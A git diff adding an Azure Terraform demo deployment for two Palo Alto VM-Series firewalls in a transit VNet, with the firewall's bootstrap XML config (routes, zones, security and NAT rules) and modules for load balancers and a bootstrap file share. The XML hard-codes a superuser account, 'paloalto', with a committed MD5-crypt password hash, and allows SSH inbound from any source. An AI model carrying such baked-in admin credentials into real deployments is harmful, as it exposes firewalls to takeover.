+                      <hold-time>2</hold-time>
+                    </path-monitor>
+                    <interface>ethernet1/1</interface>
+                    <metric>10</metric>
+                    <destination>0.0.0.0/0</destination>
+                    <route-table>
+                      <unicast/>
+                    </route-table>
+                  </entry>
+                  <entry name="to-spoke1">
+                    <nexthop>
+                      <next-vr>trust-vr</next-vr>
+                    </nexthop>
+                    <bfd>
+                      <profile>None</profile>
+                    </bfd>
+                    <path-monitor>
+                      <enable>no</enable>
+                      <failure-condition>any</failure-condition>
+                      <hold-time>2</hold-time>
+                    </path-monitor>
+                    <metric>10</metric>
+                    <destination>10.1.0.0/16</destination>
+                    <route-table>
+                      <unicast/>
+                    </route-table>
+                  </entry>
+                  <entry name="to-spoke2">
+                    <nexthop>
+                      <next-vr>trust-vr</next-vr>
+                    </nexthop>
+                    <bfd>
+                      <profile>None</profile>
+                    </bfd>
+                    <path-monitor>
+                      <enable>no</enable>
+                      <failure-condition>any</failure-condition>
+                      <hold-time>2</hold-time>
+                    </path-monitor>
+                    <metric>10</metric>
+                    <destination>10.2.0.0/16</destination>
+                    <route-table>
+                      <unicast/>
+                    </route-table>
+                  </entry>
+                </static-route>
+              </ip>
+            </routing-table>
+            <ecmp>
+              <algorithm>
+                <ip-modulo/>
+              </algorithm>
+            </ecmp>
+          </entry>
+          <entry name="trust-vr">
+            <interface>
+              <member>ethernet1/2</member>
+            </interface>
+            <admin-dists>
+              <static>10</static>
+              <static-ipv6>10</static-ipv6>
+              <ospf-int>30</ospf-int>
+              <ospf-ext>110</ospf-ext>
+              <ospfv3-int>30</ospfv3-int>
+              <ospfv3-ext>110</ospfv3-ext>
+              <ibgp>200</ibgp>
+              <ebgp>20</ebgp>
+              <rip>120</rip>
+            </admin-dists>
+            <routing-table>
+              <ip>
+                <static-route>
+                  <entry name="health-probe">
+                    <nexthop>
+                      <ip-address>10.0.2.1</ip-address>
+                    </nexthop>
+                    <bfd>
+                      <profile>None</profile>
+                    </bfd>
+                    <path-monitor>
+                      <enable>no</enable>
+                      <failure-condition>any</failure-condition>
+                      <hold-time>2</hold-time>
+                    </path-monitor>
+                    <interface>ethernet1/2</interface>
+                    <metric>10</metric>
+                    <destination>168.63.129.16/32</destination>
+                    <route-table>
+                      <unicast/>
+                    </route-table>
+                  </entry>
+                  <entry name="default">
+                    <nexthop>
+                      <next-vr>untrust-vr</next-vr>
+                    </nexthop>
+                    <bfd>
+                      <profile>None</profile>
+                    </bfd>
+                    <path-monitor>
+                      <enable>no</enable>
+                      <failure-condition>any</failure-condition>
+                      <hold-time>2</hold-time>
+                    </path-monitor>
+                    <metric>10</metric>
+                    <destination>0.0.0.0/0</destination>
+                    <route-table>
+                      <unicast/>
+                    </route-table>
+                  </entry>
+                  <entry name="spoke1">
+                    <nexthop>
+                      <ip-address>10.0.2.1</ip-address>
+                    </nexthop>
+                    <bfd>
+                      <profile>None</profile>
+                    </bfd>
+                    <path-monitor>
+                      <enable>no</enable>
+                      <failure-condition>any</failure-condition>
+                      <hold-time>2</hold-time>
+                    </path-monitor>
+                    <interface>ethernet1/2</interface>
+                    <metric>10</metric>
+                    <destination>10.1.0.0/16</destination>
+                    <route-table>
+                      <unicast/>
+                    </route-table>
+                  </entry>
+                  <entry name="spoke2">
+                    <nexthop>
+                      <ip-address>10.0.2.1</ip-address>
+                    </nexthop>
+                    <bfd>
+                      <profile>None</profile>
+                    </bfd>
+                    <path-monitor>
+                      <enable>no</enable>
+                      <failure-condition>any</failure-condition>
+                      <hold-time>2</hold-time>
+                    </path-monitor>
+                    <interface>ethernet1/2</interface>
+                    <metric>10</metric>
+                    <destination>10.2.0.0/16</destination>
+                    <route-table>
+                      <unicast/>
+                    </route-table>
+                  </entry>
+                </static-route>
+              </ip>
+            </routing-table>
+            <ecmp>
+              <algorithm>
+                <ip-modulo/>
+              </algorithm>
+            </ecmp>
+            <protocol>
+              <bgp>
+                <routing-options>
+                  <graceful-restart>
+                    <enable>yes</enable>
+                  </graceful-restart>
+                </routing-options>
+                <enable>no</enable>
+              </bgp>
+              <rip>
+                <enable>no</enable>
+              </rip>
+              <ospf>
+                <enable>no</enable>
+              </ospf>
+              <ospfv3>
+                <enable>no</enable>
+              </ospfv3>
+            </protocol>
+          </entry>
+        </virtual-router>
+      </network>
+      <vsys>
+        <entry name="vsys1">
+          <zone>
+            <entry name="trust">
+              <network>
+                <layer3>
+                  <member>ethernet1/2</member>
+                </layer3>
+              </network>
+              <enable-user-identification>no</enable-user-identification>
+            </entry>
+            <entry name="untrust">
+              <network>
+                <layer3>
+                  <member>ethernet1/1</member>
+                </layer3>
+              </network>
+              <enable-user-identification>no</enable-user-identification>
+            </entry>
+          </zone>
+          <import>
+            <network>
+              <interface>
+                <member>ethernet1/2</member>
+                <member>ethernet1/1</member>
+                <member>vlan</member>
+                <member>loopback</member>
+                <member>tunnel</member>
+              </interface>
+              <vlan/>
+              <virtual-router>
+                <member>untrust-vr</member>
+                <member>trust-vr</member>
+              </virtual-router>
+              <virtual-wire/>
+            </network>
+          </import>
+          <application/>
+          <application-group/>
+          <service>
+            <entry name="tcp-22">
+              <protocol>
+                <tcp>
+                  <port>22</port>
+                  <override>
+                    <no/>
+                  </override>
+                </tcp>
+              </protocol>
+            </entry>
+          </service>
+          <service-group/>
+          <schedule/>
+          <rulebase>
+            <security>
+              <rules>
+                <entry name="health-check" uuid="a91152e7-1ea9-441b-b7bc-2ddcf935c328">
+                  <to>
+                    <member>any</member>
+                  </to>
+                  <from>
+                    <member>any</member>
+                  </from>
+                  <source>
+                    <member>azure-lb-probe</member>
+                  </source>
+                  <destination>
+                    <member>any</member>
+                  </destination>
+                  <source-user>
+                    <member>any</member>
+                  </source-user>
+                  <category>
+                    <member>any</member>
+                  </category>
+                  <application>
+                    <member>any</member>
+                  </application>
+                  <service>
+                    <member>any</member>
+                  </service>
+                  <hip-profiles>
+                    <member>any</member>
+                  </hip-profiles>
+                  <action>allow</action>
+                </entry>
+                <entry name="inbound-web" uuid="906ac66f-810d-4b10-a1f3-3ca4de7f5562">
+                  <to>
+                    <member>trust</member>
+                  </to>
+                  <from>
+                    <member>untrust</member>
+                  </from>
+                  <source>
+                    <member>any</member>
+                  </source>
+                  <destination>
+                    <member>any</member>
+                  </destination>
+                  <source-user>
+                    <member>any</member>
+                  </source-user>
+                  <category>
+                    <member>any</member>
+                  </category>
+                  <application>
+                    <member>web-browsing</member>
+                  </application>
+                  <service>
+                    <member>application-default</member>
+                  </service>
+                  <hip-profiles>
+                    <member>any</member>
+                  </hip-profiles>
+                  <action>allow</action>
+                </entry>
+                <entry name="inbound-ssh" uuid="1ef5074f-a01a-4270-9717-c3daf57fc1ea">
+                  <to>
+                    <member>trust</member>
+                  </to>
+                  <from>
+                    <member>untrust</member>
+                  </from>
+                  <source>
+                    <member>any</member>
+                  </source>
+                  <destination>
+                    <member>any</member>
+                  </destination>
+                  <source-user>
+                    <member>any</member>
+                  </source-user>
+                  <category>
+                    <member>any</member>
+                  </category>
+                  <application>
+                    <member>ssh</member>
+                  </application>
+                  <service>
+                    <member>application-default</member>
+                  </service>
+                  <hip-profiles>
+                    <member>any</member>
+                  </hip-profiles>
+                  <action>allow</action>
+                </entry>
+                <entry name="east-west-trusted" uuid="310224a5-ebed-4ef7-aa8c-d137948e164d">
+                  <rule-type>universal</rule-type>
+                  <from>
+                    <member>trust</member>
+                  </from>
+                  <to>
+                    <member>trust</member>
+                  </to>
+                  <source>
+                    <member>spoke1-vnet</member>
+                    <member>spoke2-vnet</member>
+                  </source>
+                  <negate-source>no</negate-source>
+                  <source-user>
+                    <member>any</member>
+                  </source-user>
+                  <hip-profiles>
+                    <member>any</member>
+                  </hip-profiles>
+                  <destination>
+                    <member>spoke1-vnet</member>
+                    <member>spoke2-vnet</member>
+                  </destination>
+                  <negate-destination>no</negate-destination>
+                  <application>
+                    <member>ping</member>
+                    <member>ssh</member>
+                    <member>web-browsing</member>
+                  </application>
+                  <service>
+                    <member>application-default</member>
+                  </service>
+                  <category>
+                    <member>any</member>
+                  </category>
+                  <action>allow</action>
+                  <log-start>no</log-start>
+                  <log-end>yes</log-end>
+                  <disabled>no</disabled>
+                  <icmp-unreachable>no</icmp-unreachable>
+                  <option>
+                    <disable-server-response-inspection>no</disable-server-response-inspection>
+                  </option>
+                </entry>
+                <entry name="outbound" uuid="23d8a1b8-1a4b-462a-b7d6-d7cd25007c3f">
+                  <rule-type>universal</rule-type>
+                  <from>
+                    <member>trust</member>
+                  </from>
+                  <to>
+                    <member>untrust</member>
+                  </to>
+                  <source>
+                    <member>spoke1-vnet</member>
+                    <member>spoke2-vnet</member>
+                  </source>
+                  <negate-source>no</negate-source>
+                  <source-user>
+                    <member>any</member>
+                  </source-user>
+                  <hip-profiles>
+                    <member>any</member>
+                  </hip-profiles>
+                  <destination>
+                    <member>any</member>
+                  </destination>
+                  <negate-destination>no</negate-destination>
+                  <application>
+                    <member>apt-get</member>
+                    <member>ntp</member>
+                    <member>ping</member>
+                    <member>ssl</member>
+                    <member>web-browsing</member>
+                  </application>
+                  <service>
+                    <member>application-default</member>
+                  </service>
+                  <category>
+                    <member>any</member>
+                  </category>
+                  <action>allow</action>
+                  <log-start>no</log-start>
+                  <log-end>yes</log-end>
+                  <disabled>no</disabled>
+                  <icmp-unreachable>no</icmp-unreachable>
+                  <option>
+                    <disable-server-response-inspection>no</disable-server-response-inspection>
+                  </option>
+                </entry>
+              </rules>
+            </security>
+            <default-security-rules>
+              <rules>
+                <entry name="interzone-default" uuid="3d00ca2f-4af5-40e1-8fad-edd407f1bf59">
+                  <action>deny</action>
+                  <log-start>no</log-start>
+                  <log-end>yes</log-end>
+                </entry>
+                <entry name="intrazone-default" uuid="537e2fbf-aaee-4fe5-bad3-f9552f18d7d8">
+                  <action>deny</action>
+                  <log-start>no</log-start>
+                  <log-end>yes</log-end>
+                </entry>
+              </rules>
+            </default-security-rules>
+            <application-override>
+              <rules/>
+            </application-override>
+            <decryption>
+              <rules/>
+            </decryption>
+            <tunnel-inspect>
+              <rules/>
+            </tunnel-inspect>
+            <authentication>
+              <rules/>
+            </authentication>
+            <nat>
+              <rules>
+                <entry name="azure-probe-no-nat" uuid="e9ee92aa-2bc6-4792-add3-d99a134b212d">
+                  <nat-type>ipv4</nat-type>
+                  <from>
+                    <member>untrust</member>
+                  </from>
+                  <to>
+                    <member>untrust</member>
+                  </to>
+                  <to-interface>any</to-interface>
+                  <service>any</service>
+                  <source>
+                    <member>azure-lb-probe</member>
+                  </source>
+                  <destination>
+                    <member>any</member>
+                  </destination>
+                  <disabled>no</disabled>
+                  <description>This NAT policy prevents the public load balancer's health probes from being NATed.</description>
+                </entry>
+                <entry name="inbound-http" uuid="f059ba30-01b2-49ad-9ff1-0d2195e3b561">
+                  <nat-type>ipv4</nat-type>
+                  <from>
+                    <member>untrust</member>
+                  </from>
+                  <to>
+                    <member>untrust</member>
+                  </to>
+                  <to-interface>ethernet1/1</to-interface>
+                  <service>service-http</service>
+                  <source>
+                    <member>any</member>
+                  </source>
+                  <destination>
+                    <member>any</member>
+                  </destination>
+                  <disabled>no</disabled>
+                  <source-translation>
+                    <dynamic-ip-and-port>
+                      <interface-address>
+                        <interface>ethernet1/2</interface>
+                      </interface-address>
+                    </dynamic-ip-and-port>
+                  </source-translation>
+                  <dynamic-destination-translation>
+                    <translated-address>spoke1-intlb</translated-address>
+                    <translated-port>80</translated-port>
+                  </dynamic-destination-translation>
+                  <description>NATs inbound request to internal LB in spoke1</description>
+                </entry>
+                <entry name="inbound-ssh" uuid="1858311c-6126-4601-9766-da8d0ba5f7b5">
+                  <nat-type>ipv4</nat-type>
+                  <from>
+                    <member>untrust</member>
+                  </from>
+                  <to>
+                    <member>untrust</member>
+                  </to>
+                  <to-interface>ethernet1/1</to-interface>
+                  <service>tcp-22</service>
+                  <source>
+                    <member>any</member>
+                  </source>
+                  <destination>
+                    <member>any</member>
+                  </destination>
+                  <disabled>no</disabled>
+                  <source-translation>
+                    <dynamic-ip-and-port>
+                      <interface-address>
+                        <interface>ethernet1/2</interface>
+                      </interface-address>
+                    </dynamic-ip-and-port>
+                  </source-translation>
+                  <dynamic-destination-translation>
+                    <translated-address>spoke2-vm</translated-address>
+                    <translated-port>22</translated-port>
+                  </dynamic-destination-translation>
+                  <description>NATs inbound request to jump server in Spoke 1.</description>
+                </entry>
+                <entry name="outbound" uuid="fd57dee6-7745-4776-8800-fe8fe76bd7ab">
+                  <nat-type>ipv4</nat-type>
+                  <from>
+                    <member>trust</member>
+                  </from>
+                  <to>
+                    <member>untrust</member>
+                  </to>
+                  <to-interface>any</to-interface>
+                  <service>any</service>
+                  <source>
+                    <member>any</member>
+                  </source>
+                  <destination>
+                    <member>any</member>
+                  </destination>
+                  <source-translation>
+                    <dynamic-ip-and-port>
+                      <interface-address>
+                        <interface>ethernet1/1</interface>
+                      </interface-address>
+                    </dynamic-ip-and-port>
+                  </source-translation>
+                  <disabled>no</disabled>
+                </entry>
+              </rules>
+            </nat>
+            <qos>
+              <rules/>
+            </qos>
+            <pbf>
+              <rules/>
+            </pbf>
+            <dos>
+              <rules/>
+            </dos>
+          </rulebase>
+          <address>
+            <entry name="azure-lb-probe">
+              <ip-netmask>168.63.129.16/32</ip-netmask>
+              <tag>
+                <member>azure-resource</member>
+              </tag>
+            </entry>
+            <entry name="spoke1-vm">
+              <ip-netmask>10.1.0.4</ip-netmask>
+              <tag>
+                <member>azure-resource</member>
+              </tag>
+            </entry>
+            <entry name="spoke2-vm">
+              <ip-netmask>10.2.0.4</ip-netmask>
+              <tag>
+                <member>azure-resource</member>
+              </tag>
+            </entry>
+            <entry name="spoke1-vnet">
+              <ip-netmask>10.1.0.0/16</ip-netmask>
+              <tag>
+                <member>azure-resource</member>
+              </tag>
+            </entry>
+            <entry name="spoke2-vnet">
+              <ip-netmask>10.2.0.0/16</ip-netmask>
+              <tag>
+                <member>azure-resource</member>
+              </tag>
+            </entry>
+            <entry name="spoke1-intlb">
+              <ip-netmask>10.1.0.100</ip-netmask>
+              <tag>
+                <member>azure-resource</member>
+              </tag>
+            </entry>
+          </address>
+          <address-group/>
+          <external-list/>
+          <region/>
+          <application-tag/>
+          <application-filter/>
+          <profile-group/>
+          <authentication-object/>
+          <tag>
+            <entry name="untrust">
+              <color>color20</color>
+            </entry>
+            <entry name="trust">
+              <color>color13</color>
+            </entry>
+            <entry name="azure-resource">
+              <color>color24</color>
+            </entry>
+            <entry name="azure-vnet">
+              <color>color22</color>
+            </entry>
+          </tag>
+          <application-status/>
+          <threats>
+            <vulnerability/>
+            <spyware/>
+          </threats>
+          <profiles>
+            <virus/>
+            <spyware/>
+            <vulnerability/>
+            <url-filtering/>
+            <custom-url-category/>
+            <file-blocking/>
+            <data-filtering/>
+            <data-objects/>
+            <hip-objects/>
+            <hip-profiles/>
+            <dos-protection/>
+            <decryption/>
+            <wildfire-analysis/>
+            <gtp/>
+            <sctp/>
+          </profiles>
+        </entry>
+      </vsys>
+    </entry>
+  </devices>
+  <mgt-config>
+    <users>
+      <entry name="admin">
+        <phash>*</phash>
+        <permissions>
+          <role-based>
+            <superuser>yes</superuser>
+          </role-based>
+        </permissions>
+      </entry>
+      <entry name="paloalto">
+        <phash>$1$uoktdfcd$ETFyCMQoc9Atk1GyysHYU1</phash>
+        <permissions>
+          <role-based>
+            <superuser>yes</superuser>
+          </role-based>
+        </permissions>
+      </entry>
+    </users>
+    <password-complexity>
+      <enabled>yes</enabled>
+      <minimum-length>8</minimum-length>
+    </password-complexity>
+  </mgt-config>
+  <shared>
+    <content-preview>
+      <application/>
+      <application-type>
+        <category/>
+        <technology/>
+      </application-type>
+    </content-preview>
+    <application/>
+    <application-group/>
+    <service/>
+    <service-group/>
+    <botnet>
+      <configuration>
+        <http>
+          <dynamic-dns>
+            <enabled>yes</enabled>
+            <threshold>5</threshold>
+          </dynamic-dns>
+          <malware-sites>
+            <enabled>yes</enabled>
+            <threshold>5</threshold>
+          </malware-sites>
+          <recent-domains>
+            <enabled>yes</enabled>
+            <threshold>5</threshold>
+          </recent-domains>
+          <ip-domains>
+            <enabled>yes</enabled>
+            <threshold>10</threshold>
+          </ip-domains>
+          <executables-from-unknown-sites>
+            <enabled>yes</enabled>
+            <threshold>5</threshold>
+          </executables-from-unknown-sites>
+        </http>
+        <other-applications>
+          <irc>yes</irc>
+        </other-applications>
+        <unknown-applications>
+          <unknown-tcp>
+            <destinations-per-hour>10</destinations-per-hour>
+            <sessions-per-hour>10</sessions-per-hour>
+            <session-length>
+              <maximum-bytes>100</maximum-bytes>
+              <minimum-bytes>50</minimum-bytes>
+            </session-length>
+          </unknown-tcp>
+          <unknown-udp>
+            <destinations-per-hour>10</destinations-per-hour>
+            <sessions-per-hour>10</sessions-per-hour>
+            <session-length>
+              <maximum-bytes>100</maximum-bytes>
+              <minimum-bytes>50</minimum-bytes>
+            </session-length>
+          </unknown-udp>
+        </unknown-applications>
+      </configuration>
+      <report>
+        <topn>100</topn>
+        <scheduled>yes</scheduled>
+      </report>
+    </botnet>
+    <log-settings>
+      <profiles/>
+    </log-settings>
+  </shared>
+</config>
diff --git a/gcp/gcp-terraform-mclimans/demo_deployments/two_tier/bootstrap/init-cfg.txt b/azure/transit_2fw_2spoke_common/bootstrap_files/config/init-cfg.txt
similarity index 80%
rename from gcp/gcp-terraform-mclimans/demo_deployments/two_tier/bootstrap/init-cfg.txt
rename to azure/transit_2fw_2spoke_common/bootstrap_files/config/init-cfg.txt
index 840154aa..44878949 100644
--- a/gcp/gcp-terraform-mclimans/demo_deployments/two_tier/bootstrap/init-cfg.txt
+++ b/azure/transit_2fw_2spoke_common/bootstrap_files/config/init-cfg.txt
@@ -4,6 +4,6 @@ default-gateway=
 netmask=
 ipv6-address=
 ipv6-default-gateway=
-hostname=vm-series
+dhcp-accept-server-hostname=yes
 dns-primary=8.8.8.8
 dns-secondary=4.2.2.2
\ No newline at end of file
diff --git a/azure/transit_2fw_2spoke_common/bootstrap_files/content/.gitignore b/azure/transit_2fw_2spoke_common/bootstrap_files/content/.gitignore
new file mode 100644
index 00000000..c96a04f0
--- /dev/null
+++ b/azure/transit_2fw_2spoke_common/bootstrap_files/content/.gitignore
@@ -0,0 +1,2 @@
+*
+!.gitignore
\ No newline at end of file
diff --git a/azure/transit_2fw_2spoke_common/bootstrap_files/license/authcodes b/azure/transit_2fw_2spoke_common/bootstrap_files/license/authcodes
new file mode 100644
index 00000000..e69de29b
diff --git a/azure/transit_2fw_2spoke_common/bootstrap_files/software/.gitignore b/azure/transit_2fw_2spoke_common/bootstrap_files/software/.gitignore
new file mode 100644
index 00000000..c96a04f0
--- /dev/null
+++ b/azure/transit_2fw_2spoke_common/bootstrap_files/software/.gitignore
@@ -0,0 +1,2 @@
+*
+!.gitignore
\ No newline at end of file
diff --git a/azure/transit_2fw_2spoke_common/fw_common.tf b/azure/transit_2fw_2spoke_common/fw_common.tf
new file mode 100644
index 00000000..2f261ad5
--- /dev/null
+++ b/azure/transit_2fw_2spoke_common/fw_common.tf
@@ -0,0 +1,121 @@
+#-----------------------------------------------------------------------------------------------------------------
+# Create resource group for FWs, FW NICs, and FW LBs
+
+resource "azurerm_resource_group" "common_fw" {
+  name     = "${var.global_prefix}${var.fw_prefix}-rg"
+  location = var.location
+}
+
+#-----------------------------------------------------------------------------------------------------------------
+# Create storage account and file share for bootstrapping
+
+resource "random_string" "main" {
+  length      = 15
+  min_lower   = 5
+  min_numeric = 10
+  special     = false
+}
+
+resource "azurerm_storage_account" "main" {
+  name                     = random_string.main.result
+  account_tier             = "Standard"
+  account_replication_type = "LRS"
+  location                 = azurerm_resource_group.common_fw.location
+  resource_group_name      = azurerm_resource_group.common_fw.name
+}
+
+module "common_fileshare" {
+  source               = "./modules/azure_bootstrap/"
+  name                 = "${var.fw_prefix}-bootstrap"
+  quota                = 1
+  storage_account_name = azurerm_storage_account.main.name
+  storage_account_key  = azurerm_storage_account.main.primary_access_key
+  local_file_path        = "bootstrap_files/"
+}
+
+
+#-----------------------------------------------------------------------------------------------------------------
+# Create VM-Series.  For every fw_name entered, an additional VM-Series instance will be deployed.
+
+module "common_fw" {
+  source                    = "./modules/vmseries/"
+  name                      = "${var.fw_prefix}-vm"
+  vm_count                  = var.fw_count
+  username                  = var.fw_username
+  password                  = var.fw_password
+  panos                     = var.fw_panos
+  license                   = var.fw_license
+  nsg_prefix                = var.fw_nsg_prefix
+  avset_name                = "${var.fw_prefix}-avset"
+  subnet_mgmt               = module.vnet.vnet_subnets[0]
+  subnet_untrust            = module.vnet.vnet_subnets[1]
+  subnet_trust              = module.vnet.vnet_subnets[2]
+  nic0_public_ip            = true
+  nic1_public_ip            = true
+  nic2_public_ip            = false
+  nic1_backend_pool_ids     = [module.common_extlb.backend_pool_id]
+  nic2_backend_pool_ids     = [module.common_intlb.backend_pool_id]
+  bootstrap_storage_account = azurerm_storage_account.main.name
+  bootstrap_access_key      = azurerm_storage_account.main.primary_access_key
+  bootstrap_file_share      = module.common_fileshare.file_share_name
+  bootstrap_share_directory = "None"
+  location                  = var.location
+  resource_group_name       = azurerm_resource_group.common_fw.name
+  
+  dependencies = [
+    module.common_fileshare.completion
+  ]
+}
+
+#-----------------------------------------------------------------------------------------------------------------
+# Create public load balancer.  Load balancer uses firewall's untrust interfaces as its backend pool.
+
+module "common_extlb" {
+  source                  = "./modules/lb/"
+  name                    = "${var.fw_prefix}-public-lb"
+  type                    = "public"
+  sku                     = "Standard"
+  probe_ports             = [22]
+  frontend_ports          = [80, 22, 443]
+  backend_ports           = [80, 22, 443]
+  protocol                = "Tcp"
+  location                = var.location
+  resource_group_name     = azurerm_resource_group.common_fw.name
+}
+
+#-----------------------------------------------------------------------------------------------------------------
+# Create internal load balancer. Load balancer uses firewall's trust interfaces as its backend pool
+
+module "common_intlb" {
+  source                  = "./modules/lb/"
+  name                    = "${var.fw_prefix}-internal-lb"
+  type                    = "private"
+  sku                     = "Standard"
+  probe_ports             = [22]
+  frontend_ports          = [0]
+  backend_ports           = [0]
+  protocol                = "All"
+  subnet_id               = module.vnet.vnet_subnets[2]
+  private_ip_address      = var.fw_internal_lb_ip
+  location                = var.location
+  resource_group_name     = azurerm_resource_group.common_fw.name
+}
+
+#-----------------------------------------------------------------------------------------------------------------
+# Outputs to terminal
+
+output EXT-LB {
+  value = "http://${module.common_extlb.public_ip[0]}"
+}
+
+output MGMT-FW1 {
+  value = "https://${module.common_fw.nic0_public_ip[0]}"
+}
+
+output MGMT-FW2 {
+  value = "https://${module.common_fw.nic0_public_ip[1]}"
+}
+
+output SSH-TO-SPOKE2 {
+  value = "ssh ${var.spoke_username}@${module.common_extlb.public_ip[0]}"
+}
diff --git a/azure/transit_2fw_2spoke_common/fw_vnet.tf b/azure/transit_2fw_2spoke_common/fw_vnet.tf
new file mode 100644
index 00000000..826b7152
--- /dev/null
+++ b/azure/transit_2fw_2spoke_common/fw_vnet.tf
@@ -0,0 +1,16 @@
+#-----------------------------------------------------------------------------------------------------------------
+# Create Transit VNET
+resource "azurerm_resource_group" "transit" {
+  name     = "${var.global_prefix}${var.transit_prefix}-rg"
+  location = var.location
+}
+
+module "vnet" {
+  source              = "./modules/vnet/"
+  name                = "${var.transit_prefix}-vnet"
+  address_space       = var.transit_vnet_cidr
+  subnet_names        = var.transit_subnet_names
+  subnet_prefixes     = var.transit_subnet_cidrs
+  location            = var.location
+  resource_group_name = azurerm_resource_group.transit.name
+}
diff --git a/azure/transit_2fw_2spoke_common/images/diagram.png b/azure/transit_2fw_2spoke_common/images/diagram.png
new file mode 100644
index 00000000..45f1d146
Binary files /dev/null and b/azure/transit_2fw_2spoke_common/images/diagram.png differ
diff --git a/azure/transit_2fw_2spoke_common/images/tfvars.png b/azure/transit_2fw_2spoke_common/images/tfvars.png
new file mode 100644
index 00000000..afd57343
Binary files /dev/null and b/azure/transit_2fw_2spoke_common/images/tfvars.png differ
diff --git a/azure/transit_2fw_2spoke_common/modules/azure_bootstrap/main.tf b/azure/transit_2fw_2spoke_common/modules/azure_bootstrap/main.tf
new file mode 100644
index 00000000..1a5c1f7a
--- /dev/null
+++ b/azure/transit_2fw_2spoke_common/modules/azure_bootstrap/main.tf
@@ -0,0 +1,40 @@
+
+
+resource "random_string" "randomstring" {
+  length      = 15
+  min_lower   = 5
+  min_numeric = 10
+  special     = false
+}
+
+resource "azurerm_storage_share" "main" {
+  name                 = "${var.name}${random_string.randomstring.result}"
+  storage_account_name = var.storage_account_name
+  quota                = var.quota
+}
+
+resource "null_resource" "upload" {
+provisioner "local-exec" {
+  command = <<EOT
+az storage directory create --account-name ${var.storage_account_name} --account-key ${var.storage_account_key} --share-name ${azurerm_storage_share.main.name} --name config
+az storage directory create --account-name ${var.storage_account_name} --account-key ${var.storage_account_key} --share-name ${azurerm_storage_share.main.name} --name content
+az storage directory create --account-name ${var.storage_account_name} --account-key ${var.storage_account_key} --share-name ${azurerm_storage_share.main.name} --name license
+az storage directory create --account-name ${var.storage_account_name} --account-key ${var.storage_account_key} --share-name ${azurerm_storage_share.main.name} --name software
+
+
+az storage file upload-batch --account-name ${var.storage_account_name} --account-key ${var.storage_account_key} --destination ${azurerm_storage_share.main.name}/config  --source ${var.local_file_path}config
+az storage file upload-batch --account-name ${var.storage_account_name} --account-key ${var.storage_account_key} --destination ${azurerm_storage_share.main.name}/content --source ${var.local_file_path}content
+az storage file upload-batch --account-name ${var.storage_account_name} --account-key ${var.storage_account_key} --destination ${azurerm_storage_share.main.name}/license --source ${var.local_file_path}license
+az storage file upload-batch --account-name ${var.storage_account_name} --account-key ${var.storage_account_key} --destination ${azurerm_storage_share.main.name}/software --source ${var.local_file_path}software
+
+
+EOT
+}
+}
+
+resource "null_resource" "dependency_setter" {
+  depends_on = [
+    azurerm_storage_share.main,
+    null_resource.upload
+  ]
+}
\ No newline at end of file
diff --git a/azure/transit_2fw_2spoke_common/modules/azure_bootstrap/outputs.tf b/azure/transit_2fw_2spoke_common/modules/azure_bootstrap/outputs.tf
new file mode 100644
index 00000000..c4f2c62e
--- /dev/null
+++ b/azure/transit_2fw_2spoke_common/modules/azure_bootstrap/outputs.tf
@@ -0,0 +1,7 @@
+output file_share_name {
+  value = azurerm_storage_share.main.name
+}
+
+output "completion" {
+  value = null_resource.dependency_setter.id
+}
\ No newline at end of file
diff --git a/azure/transit_2fw_2spoke_common/modules/azure_bootstrap/variables.tf b/azure/transit_2fw_2spoke_common/modules/azure_bootstrap/variables.tf
new file mode 100644
index 00000000..0dbf04b4
--- /dev/null
+++ b/azure/transit_2fw_2spoke_common/modules/azure_bootstrap/variables.tf
@@ -0,0 +1,14 @@
+variable storage_account_name {
+}
+
+variable storage_account_key {
+}
+
+variable name {
+}
+
+variable quota {
+}
+
+variable local_file_path {
+}
\ No newline at end of file
diff --git a/azure/transit_2fw_2spoke_common/modules/lb/main.tf b/azure/transit_2fw_2spoke_common/modules/lb/main.tf
new file mode 100644
index 00000000..78417ec2
--- /dev/null
+++ b/azure/transit_2fw_2spoke_common/modules/lb/main.tf
@@ -0,0 +1,51 @@
+resource "azurerm_public_ip" "main" {
+  count               = var.type == "public" ? 1 : 0
+  name                = "${var.name}-pip"
+  location            = var.location
+  resource_group_name = var.resource_group_name
+  allocation_method   = "Static"
+  sku                 = var.sku
+}
+
+resource "azurerm_lb" "main" {
+  name                = var.name
+  location            = var.location
+  resource_group_name = var.resource_group_name
+  sku                 = var.sku
+
+  frontend_ip_configuration {
+    name                          = var.frontend_name
+    public_ip_address_id          = var.type == "public" ? join("", azurerm_public_ip.main.*.id) : ""
+    subnet_id                     = var.type == "public" ? "" : var.subnet_id
+    private_ip_address_allocation = var.private_ip_address == "" ? "Dynamic" : "Static"
+    private_ip_address            = var.type == "public" ? "" : var.private_ip_address
+  }
+}
+
+resource "azurerm_lb_backend_address_pool" "main" {
+  name                = var.backend_name
+  resource_group_name = var.resource_group_name
+  loadbalancer_id     = azurerm_lb.main.id
+}
+
+resource "azurerm_lb_probe" "main" {
+  count               = length(var.probe_ports)
+  name                = "${var.probe_name}-${element(var.probe_ports, count.index)}"
+  resource_group_name = var.resource_group_name
+  loadbalancer_id     = azurerm_lb.main.id
+  port                = element(var.probe_ports, count.index)
+}
+
+resource "azurerm_lb_rule" "main" {
+  count                          = length(var.frontend_ports)
+  name                           = "rule-${count.index}"
+  resource_group_name            = var.resource_group_name
+  loadbalancer_id                = azurerm_lb.main.id
+  protocol                       = var.protocol
+  frontend_port                  = element(var.frontend_ports, count.index)
+  backend_port                   = element(var.backend_ports, count.index)
+  frontend_ip_configuration_name = var.frontend_name
+  backend_address_pool_id        = azurerm_lb_backend_address_pool.main.id
+  probe_id                       = element(azurerm_lb_probe.main.*.id, count.index)
+  enable_floating_ip             = var.enable_floating_ip
+}
diff --git a/azure/transit_2fw_2spoke_common/modules/lb/outputs.tf b/azure/transit_2fw_2spoke_common/modules/lb/outputs.tf
new file mode 100644
index 00000000..b0933047
--- /dev/null
+++ b/azure/transit_2fw_2spoke_common/modules/lb/outputs.tf
@@ -0,0 +1,7 @@
+output public_ip {
+  value = azurerm_public_ip.main.*.ip_address
+}
+
+output backend_pool_id {
+  value = azurerm_lb_backend_address_pool.main.id
+}
\ No newline at end of file
diff --git a/azure/transit_2fw_2spoke_common/modules/lb/variables.tf b/azure/transit_2fw_2spoke_common/modules/lb/variables.tf
new file mode 100644
index 00000000..5c9e84c1
--- /dev/null
+++ b/azure/transit_2fw_2spoke_common/modules/lb/variables.tf
@@ -0,0 +1,63 @@
+variable location {
+}
+
+variable resource_group_name {
+}
+
+variable name {
+}
+
+variable private_ip_address {
+  default = ""
+}
+
+variable sku {
+  default = "Standard"
+}
+
+variable enable_floating_ip {
+  default = true
+}
+
